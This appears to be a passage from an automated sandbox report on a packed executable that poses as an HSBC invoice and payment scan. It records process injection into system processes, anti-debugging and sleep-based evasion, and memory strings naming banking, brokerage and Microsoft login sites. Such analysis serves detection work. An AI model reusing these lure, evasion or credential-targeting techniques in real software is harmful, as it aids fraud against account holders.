            Source: Binary string: wntdll.pdbUGP source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1262555347.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, HSBCscancopy-invoice778483-payment87476MT103.exe, 00000000.00000003.1261226236.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1521261547.0000000003E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1521261547.0000000003D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1430061242.0000000003B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1428153349.0000000003900000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000B.00000002.3725946989.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1521136098.0000000004526000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3725946989.0000000004890000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1523145097.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: svchost.exe, 00000002.00000003.1490000919.000000000363B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1489902771.000000000361A000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000A.00000002.3723212263.0000000001488000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: rundll32.exe, 0000000B.00000002.3728535943.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000356C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1809205515.000000001E57C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00FB20A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, | 0_2_00FB20A0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EA8B85 push ecx; ret | 0_2_00EA8B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040C958 push ebx; retf | 2_2_0040C961
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004191CB push ss; retf | 2_2_004191D3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00414A41 push ds; retf E5D3h | 2_2_00414A58
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CAC3 push 6215FF03h; ret | 2_2_0042CAD1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040BAD9 push ebp; iretd | 2_2_0040BADA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041AAAB push esi; ret | 2_2_0041AAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041AB6F push ebx; ret | 2_2_0041AB70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041844C push ebp; iretd | 2_2_0041844F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403560 push eax; ret | 2_2_00403562
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418E12 push eax; retf | 2_2_00418E14
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00413ED9 push fs; iretd | 2_2_00413EDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040C7B0 push edi; retf | 2_2_0040C7B1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D309AD push ecx; mov dword ptr [esp], ecx | 2_2_03D309B6
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_0326D301 push ebx; retf | 10_2_0326D30A
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_03279B74 push ss; retf | 10_2_03279B7C
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_0326D159 push edi; retf | 10_2_0326D15A
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_03274882 push fs; iretd | 10_2_03274884
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_032797BB push eax; retf | 10_2_032797BD
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_0327B518 push ebx; ret | 10_2_0327B519
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_03278DF5 push ebp; iretd | 10_2_03278DF8
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_0327B454 push esi; ret | 10_2_0327B455
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe | Code function: 10_2_0326C482 push ebp; iretd | 10_2_0326C483
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_048927FA pushad ; ret | 11_2_048927F9
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0489225F pushad ; ret | 11_2_048927F9
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_0489283D push eax; iretd | 11_2_04892858
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_048C09AD push ecx; mov dword ptr [esp], ecx | 11_2_048C09B6
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_04891200 push eax; iretd | 11_2_04891369
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_027B8576 push ebp; iretd | 11_2_027B8577
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_027CE820 push esi; iretd | 11_2_027CE82B
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_027C4EE9 push ebp; iretd | 11_2_027C4EEC
            Source: initial sample | Static PE information: section name: UPX0
            Source: initial sample | Static PE information: section name: UPX1
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E84A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00E84A35
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00F055FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_00F055FD
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EA33C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, | 0_2_00EA33C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | API/Special instruction interceptor: Address: E23284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D7096E rdtsc | 2_2_03D7096E
            Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 9838
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-99736
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | API coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
            Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284 | Thread sleep count: 134 > 30
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284 | Thread sleep time: -268000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284 | Thread sleep count: 9838 > 30
            Source: C:\Windows\SysWOW64\rundll32.exe TID: 7284 | Thread sleep time: -19676000s >= -30000s
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372 | Thread sleep time: -90000s >= -30000s
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372 | Thread sleep count: 47 > 30
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372 | Thread sleep time: -47000s >= -30000s
            Source: C:\Program Files (x86)\dWFBHDbrHErethdozkUpsbrmKmjLFuevWKBWVYKHnSbLMWYlvonFpjrzSBUvIzewNrGHaTqNJjVP\UTbMqukHxZGmxEZNWddXnDURe.exe TID: 6372 | Thread sleep time: -42000s >= -30000s
            Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE4696 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_00EE4696
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_00EEC9C7
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEC93C FindFirstFileW,FindClose, | 0_2_00EEC93C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00EEF200
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_00EEF35D
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00EEF65E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00EE3A2B
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EE3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_00EE3D4E
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EEBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_00EEBF27
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 11_2_027CC160 FindFirstFileW,FindNextFileW,FindClose, | 11_2_027CC160
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E84AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00E84AFE
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .co.inVMware20,15m
            Source: rundll32.exe, 0000000B.00000002.3713462234.0000000002A20000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllxq
            Source: -9698mK2.11.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: tasks.office.comVMware20,11696503903o
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l.comVMware20,11Jm
            Source: -9698mK2.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
            Source: -9698mK2.11.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
            Source: -9698mK2.11.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
            Source: -9698mK2.11.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
            Source: -9698mK2.11.dr | Binary or memory string: bankofamerica.comVMware20,11696503903x
            Source: -9698mK2.11.dr | Binary or memory string: global block list test formVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: COM.HKVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
            Source: -9698mK2.11.dr | Binary or memory string: ms.portal.azure.comVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,116
            Source: -9698mK2.11.dr | Binary or memory string: interactivebrokers.comVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,116965039
            Source: -9698mK2.11.dr | Binary or memory string: AMC password management pageVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: turbotax.intuit.comVMware20,11696503903t
            Source: -9698mK2.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3723289119.0000000001570000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000F.00000002.1811543669.000001D85E5DC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: -9698mK2.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: blocklistVMware2
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e365.comVMware20$m
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
            Source: -9698mK2.11.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
            Source: -9698mK2.11.dr | Binary or memory string: outlook.office365.comVMware20,11696503903t
            Source: -9698mK2.11.dr | Binary or memory string: outlook.office.comVMware20,11696503903s
            Source: -9698mK2.11.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: on-EU EuropeVMware20,11696503903
            Source: -9698mK2.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
            Source: -9698mK2.11.dr | Binary or memory string: dev.azure.comVMware20,11696503903j
            Source: -9698mK2.11.dr | Binary or memory string: discord.comVMware20,11696503903f
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ivebrokers.co.inVMware20,11696503903~
            Source: -9698mK2.11.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
            Source: rundll32.exe, 0000000B.00000002.3731237782.0000000007A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PasswordVMware20,11696503903^
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | API call chain: ExitProcess graph end node | graph_0-98025
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | API call chain: ExitProcess graph end node | graph_0-101128
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | API call chain: ExitProcess graph end node | graph_0-98200
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D7096E rdtsc | 2_2_03D7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417CC3 LdrLoadDll, | 2_2_00417CC3
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EF41FD BlockInput, | 0_2_00EF41FD
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E83B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00E83B4C
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00EB5CCC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, | 0_2_00EB5CCC
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00FB20A0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, | 0_2_00FB20A0
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E234F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E23550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\HSBCscancopy-invoice778483-payment87476MT103.exe | Code function: 0_2_00E21E70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DDE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DEC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D3A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D383C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB63C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D4E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D663FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D403E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D28397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2E388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D5438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DFA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB2349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DD437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2C310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D50310 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6A30B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D3A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D402E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D6E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB0283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D402A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC62A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DC62A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2A250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D36259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DEA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB8243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DB8243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03DE0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D34260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D2823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03E061E5 mov eax, dword ptr fs:[00000030h]
